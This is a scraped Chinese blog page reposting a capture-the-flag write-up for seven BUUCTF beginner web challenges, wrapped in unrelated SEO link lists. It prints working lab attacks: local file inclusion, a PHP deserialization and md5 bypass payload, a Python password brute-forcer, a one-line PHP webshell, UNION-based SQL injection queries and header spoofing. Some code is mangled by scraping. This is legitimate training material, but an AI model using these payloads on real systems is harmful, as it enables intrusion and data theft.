当前位置: 首页 > news >正文

网站建设的原则有哪些方面多语言做网站

网站建设的原则有哪些方面,多语言做网站,wordpress去掉rss订阅,网站的ftp地址怎么查buuctf Basic 1.Linux Labs 根据提示我们可以知道需要远程连接linux服务器#xff0c;这里使用xshell进行如下配置 输入ssh的用户名root#xff0c;密码123456 连接成功 构造命令 ls …/ 查看文件 查看flag cat …/flag.txt 为flag{8fee8783-1ed5-4b67-90eb-a1d603a0208…buuctf Basic 1.Linux Labs 根据提示我们可以知道需要远程连接linux服务器这里使用xshell进行如下配置 输入ssh的用户名root密码123456 连接成功 构造命令 ls …/ 查看文件 查看flag cat …/flag.txt 为flag{8fee8783-1ed5-4b67-90eb-a1d603a02080} 2.BUU LFI COURSE 1 访问url http://1dfbd1cf-beb9-496d-866d-d8be04ecc4fe.node3.buuoj.cn/ 审查源代码可以发现是通过get方式对file进行传参 构造payload http://1dfbd1cf-beb9-496d-866d-d8be04ecc4fe.node3.buuoj.cn/?file/flag 获取flag为flag{f2be8efe-aafb-4272-9026-15daa6109822} 3.BUU CODE REVIEW 1 访问url http://18edd6f4-f2cd-4c9c-89a7-38c5cd491305.node3.buuoj.cn/ 审查源码 ?php /*** Created by PhpStorm.* User: jinzhao* Date: 2019/10/6* Time: 8:04 PM*/highlight_file(__FILE__);class BUU { //类BUU public $correct ; //公有属性$correctpublic $input ; //公有属性$inputpublic function __destruct() { //公有析构方法__destruct()在当前类的实例化对象销毁前自动被调用try {$this-correct base64_encode(uniqid()); //给correct赋值为base64_encode(uniqid()) //uniqid() 函数基于以微秒计的当前时间生成一个唯一的 ID。if($this-correct $this-input) { //判断两个属性是否全等echo file_get_contents(/flag); //若全等则打印根目录下的flag}} catch (Exception $e) {}} }if($_GET[pleaseget] 1) { //GET方法传递pleaseget变量值为1if($_POST[pleasepost] 2) { //POST方法传递pleasepost变量值为2if(md5($_POST[md51]) md5($_POST[md52]) $_POST[md51] ! $_POST[md52]) { //POST方法传递md51和md52的内容不同 但是md5值相同unserialize($_POST[obj]);}} }编写代码构造payload ?php class BUU{public $correct;public $input; }$obj new BUU; $obj-input$obj-correct; BUU类中的correct和input内容强相等这里利用传引用的方法 echo serialize($obj); ?得到的字符串 O:3:“BUU”:2:{s:7:“correct”;s:0:“”;s:5:“input”;R:2;} 通过数组使用hackbar构造payload1 http://18edd6f4-f2cd-4c9c-89a7-38c5cd491305.node3.buuoj.cn/?pleaseget1 pleasepost2md51[]1md52[]2objO:3:BUU:2:{s:7:correct;s:0:;s:5:input;R:2;}如下 原理PHP 当中使用 来进行比较的时候系统会自动处理数据类型 进行分析是数字比较还是字符比较。 而当一个字符串值是0e开头的时候那么就会被当成数值。而0exxxxxx都为0. 那么就只需要找到两个不同的数值开头却是以e0开头的即可。如下图中所示。 通过弱类型使用hackbar构造payload2 http://18edd6f4-f2cd-4c9c-89a7-38c5cd491305.node3.buuoj.cn/?pleaseget1 pleasepost2md51s1885207154amd52s155964671aobjO:3:BUU:2:{s:7:correct;s:0:;s:5:input;R:2;}如下 得到flag{e8db4533-5be4-4167-823c-99aa37dd11c3} 4.BUU BRUTE 1 访问url http://1ceee8eb-6422-4482-b14b-ff6347146129.node3.buuoj.cn/ 第一种方式Python脚本 import requests url http://1ceee8eb-6422-4482-b14b-ff6347146129.node3.buuoj.cn/?usernameadminpassword for i in range(6400, 7000):res requests.get(url str(i))print([*] Try:, i)if res.text ! 密码错误为四位数字。:print(res.text)break漏洞证明 第二种方式burp爆破注意线程要慢否则会ban 得到flag{410c3a24-9741-48ad-bea2-664880484307} 5.BUU UPLOAD COURSE 1 访问url http://744b8e7e-1960-4d5e-b864-0818361e1f50.node3.buuoj.cn/index.php?fileupload.php 这是一道上传一句话木马的题有一个可以提交文件的页面 写一个普通的 php 脚本保存改后缀为 .php 尝试上传 ?php echo Hello World!; ?页面提示 可以在 ?fileuploads/6078008f5d264.jpg 查看有相应的内容回显说明自定义的 php 脚本被成功执行 把脚本修改成一句话木马 ?php eval(system($_POST[x]));?成功上传后 访问相应的 ?fileuploads/60780125ea642.jpg页面空白说明 php 命令被成功执行 hackbar构造payload http://744b8e7e-1960-4d5e-b864-0818361e1f50.node3.buuoj.cn/index.php?fileuploads/60780125ea642.jpg xls成功拿到 shell 提交 cat /flag 拿到 flag{75427571-4ee5-4f7c-b97a-b84ad969ca1f} 6.BUU SQL COURSE 1 访问url http://ab600305-c94f-49ad-9122-563513c0d4e1.node3.buuoj.cn/#/ 首页如下 审查元素点击测试新闻1的链接可以在Network处看到注入点 接下来就是常规注入构造payload查询表名 ?id0 union select 1,group_concat(table_name) from information_schema.tables where table_schemadatabase()# 为admin,contents 查询admin表中的列名 ?id0 union select 1,group_concat(column_name) from information_schema.columns where table_nameadmin and table_schemadatabase()#为idusernamepassword 查询usernamepassword的字段内容 ?id0 union select group_concat(username),group_concat(password) from admin# 为admin5398f18f7e93f8e45f6ea31bc4105a2d 得到flag{86ac0951-9f94-4b5e-b19b-07a9a4109c15} 7.BUU BURP COURSE 1 访问url http://458d48b9-467d-475b-a1b6-0186d6370927.node3.buuoj.cn/ 页面提示 构造payload X-Real-IP127.0.0.1 成功绕过 构造payload usernameadminpasswordwwoj2wio2jw93ey43eiuwdjnewkndjlwe X-Real-IP127.0.0.1得到flag{1470d887-a1c6-4109-b401-12ccda3cba8d} 文笔生疏措辞浅薄望各位大佬不吝赐教万分感谢。 免责声明由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失均由使用者本人负责 文章作者不为此承担任何责任。 转载声明儒道易行 拥有对此文章的修改和解释权如欲转载或传播此文章必须保证此文章的完整性包括版权声明等全部内容。未经作者允许不得任意修改或者增减此文章的内容不得以任何方式将其用于商业目的。 博客: https://rdyx0.github.io/先知社区 https://xz.aliyun.com/u/37846SecIN: https://www.sec-in.com/author/3097CSDN: https://blog.csdn.net/weixin_48899364?typeblog公众号 https://mp.weixin.qq.com/mp/appmsgalbum?__bizMzg5NTU2NjA1Mwactiongetalbumalbum_id1696286248027357190scene173from_msgid2247485408from_itemidx1count3nolastread1#wechat_redirectFreeBuf https://www.freebuf.com/author/%E5%9B%BD%E6%9C%8D%E6%9C%80%E5%BC%BA%E6%B8%97%E9%80%8F%E6%8E%8C%E6%8E%A7%E8%80%85
http://www.dnsts.com.cn/news/101776.html

相关文章:

  • 浅谈电子商务网站建设与管理的理解百度小程序如何开发
  • 网站显示正在建设中wordpress添加悬浮按钮
  • 华米手表官方网站wordpress前台用户注册
  • 深圳建设工程交易网站温州制造作网站
  • 网站开发与硬件合同网络营销策划方案范文
  • 廉洁 网站建设如何制作一个购物平台
  • 上海人才网官网站首页yw开头的网络黄页
  • 专业网站建设公司怎么选做公益网站的目的
  • cms企业网站模板怎么让人理解网站建设
  • 学院网站源码三门峡市住房建设局网站
  • 政协系统网站建设浏览有关小城镇建设的网站记录
  • 湛江优化网站排名seo入门书籍推荐
  • 网站页面优化技巧网站建设商城建设
  • 中英文网站用同域名人力资源公司是中介吗
  • 重启 iis 中的网站广东网站建设需要多少钱
  • 网站404做多大北京网站制作公司电话
  • 网站开发中的抓包工具输入网站查看空间
  • 珠海网站设计培训黑马程序员培训机构官网
  • 平乡县网站建设平台三门峡网站seo
  • cms网站开发毕设网站建设方案选择实现方式
  • 网站服务器是干什么的建设局招聘条件
  • 那个网站做问卷好电商网站开发周期
  • 六安网站排名优化电话企业网站内容以及功能模块规划的依据有哪些
  • 建设网站的技巧金融网站建设公司排名
  • 我想建一个网站怎么建wordpress 评论go跳转
  • 企业网站建设多长时间网页版微信二维码不出来
  • 网站开发线上眉山建网站
  • 织梦网站程序北京高端it网站建设
  • vps主机怎么建设网站asp.net 怎样生成网站
  • 网站开发需要的准备现在进入西安最新通知